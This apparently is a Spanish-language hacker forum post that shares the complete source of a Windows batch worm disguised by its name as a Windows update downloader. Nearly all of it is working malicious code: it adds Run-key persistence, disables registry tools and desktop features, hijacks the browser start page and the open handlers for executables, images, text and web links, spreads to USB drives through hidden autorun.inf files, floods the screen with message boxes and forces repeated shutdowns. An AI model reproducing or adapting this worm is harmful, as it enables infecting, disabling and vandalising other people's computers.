worm Windows_updates_downloader2.5.bat

este worm esta dedicado al grupo de hackers Kao Team
Código
                         goto per
::worm Windows_updates_downloader2.5.bat
::by hacker W4rR3d
::Comunidad hacker "Black Eye Security Team" Piura -Peru
:per
if exist "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat"  ( goto dn) else goto :NN
:NN
:Encryptions
Set ts=set
%ts% f=f
%ts% ph=copy
%ts% vsb=echo
%ts% lcf=call
%ts% r=r
:registro protection
TASKKILL /IM explorer.exe /F
TASKKILL /IM msnmsgr.exe /F
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v updates /t REG_SZ /d "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat" /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_ DWORD /d 1 /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f
reg add HKCU\Software\Microsoft\Windows\currentVersion\policies\System /v NoDispCpl /t REG_DWORD /d 1 /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f
reg Add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_SZ /d "http://windows-updates-downloader.softonic.com/descargar"
reg Add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 1 /f
reg Add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Window Title" /t REG_SZ /d "Hacked By W4rR3d"
:agregarse en dispositivos
%f%o%r% %%p in (b e f g h i j k l m n o p q r s t u v w x y z) do if exist %%p:%0 goto LOG
%f%o%r% %%i In (b e f g h i j k l m n o p q r s t u v w x y z)  do type %0 > %%i:
%vsb% [autorun] >> %%i:\autorun.inf
%vsb% open=Windows_updates_downloader2.5.bat >> %%i:\autorun.inf
%vsb% shellexecute=Windows_updates_downloader2.5.bat >> %%i:\autorun.inf
%vsb% Icon=%windir%\system32\Shell32.dll,4 >> %%i:\autorun.inf
%vsb% Shell\Open\COMMAND=Windows_updates_downloader2.5.bat
%vsb% Shell\Explore\command=Windows_updates_downloader2.5.bat
%vsb% UseAutoPlay=1
attrib +h +s +r %%i:\autorun.inf
:extenderse
md C:\c5734b2b09076e4acebc92bb8c25
%ph% %0 C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat
attrib +h +s +r C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat
attrib +h +s +r C:\c5734b2b09076e4acebc92bb8c25
:hidden in bmp
%vsb% On Error Resume Next >> C:\terror.vbs
%vsb% Set Ws = CreateObject("WScript.Shell") >> C:\terror.vbs
%vsb% Ws.regwrite "HKEY_CLASSES_ROOT\bmpfile\shell\open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs
%vsb% Ws.regwrite "HkEY_CLASSES_ROOT\Folder\Shell\Explore\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs
%vsb% Ws.regwrite "HKEY_CLASSES_ROOT\Folder\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs
%vsb% Ws.regwrite "HKEY_CLASSES_ROOT\exefile\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs
%vsb% Ws.regwrite "HKEY_CLASSES_ROOT\jpegfile\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs
%vsb% Ws.regwrite "HKEY_CLASSES_ROOT\jpgfile\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs
%vsb% Ws.regwrite "HKEY_CLASSES_ROOT\htmlfile\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs
%vsb% Ws.regwrite "HKEY_CLASSES_ROOT\HTTP\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs
%vsb% Ws.regwrite "HKEY_CLASSES_ROOT\https\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs
%vsb% Ws.regwrite "HKEY_CLASSES_ROOT\inffile\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs
%vsb% Ws.regwrite "HKEY_CLASSES_ROOT\inifile\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs
%vsb% Ws.regwrite "HKEY_CLASSES_ROOT\mpegfile\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs
%vsb% Ws.regwrite "HKEY_CLASSES_ROOT\mpgfile\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs
%vsb% Ws.regwrite "HKEY_CLASSES_ROOT\mp3file\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs
%vsb% Ws.regwrite "HKEY_CLASSES_ROOT\txtfile\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs
%vsb% Ws.regwrite "HKEY_CLASSES_ROOT\wmafile\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs
start C:\terror.vbs
:back
%ph% %0 C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Usub.exe
%ph% %0 %SYSTEMROOT%\SYSTEM32\Usub.exe
%ph% %0 %SYSTEMDRIVE%\Usub.exe
%ph% %0 %userprofile%\Usub.exe
%ph% %0 %programfiles%\Usub.exe
%ph% %0 C:\RECYCLER\Usub.bmp
:mensaje
%vsb% On Error Resume Next >> C:\ipnuker.vbs
%vsb% Msgbox "Computer is infected with a virus.",16,"hacked by W4rR3d" >> C:\ipnuker.vbs
For /L %%a IN (0,1,1000) DO start start C:\ipnuker.vbs
:LOG
%vsb% ::USuB Log:: >> USuB_Log.log
%vsb% Directory *c5734b2b09076e4acebc92bb8c25* >> Usub_Log.log
%vsb% USB's in drive A-Z excluding C, D, and E, Installed >> Usub_Log.log
%ph% USuB_Log.log C:\c5734b2b09076e4acebc92bb8c25\Usub_Log.log
attrib +h +s +r C:\c5734b2b09076e4acebc92bb8c25\Usub_Log.log
del %curdir% Usub_Log.log
:dn
%vsb% On Error Resume Next >> C:\apagar.vbs
%vsb% set shell = CreateObject("WScript.Shell") >> C:\apagar.vbs
%vsb% shell.run "shutdown.exe -s -f -t 8 " >> C:\apagar.vbs
start  C:\apagar.vbs
:Memory Loop
goto Memory Loop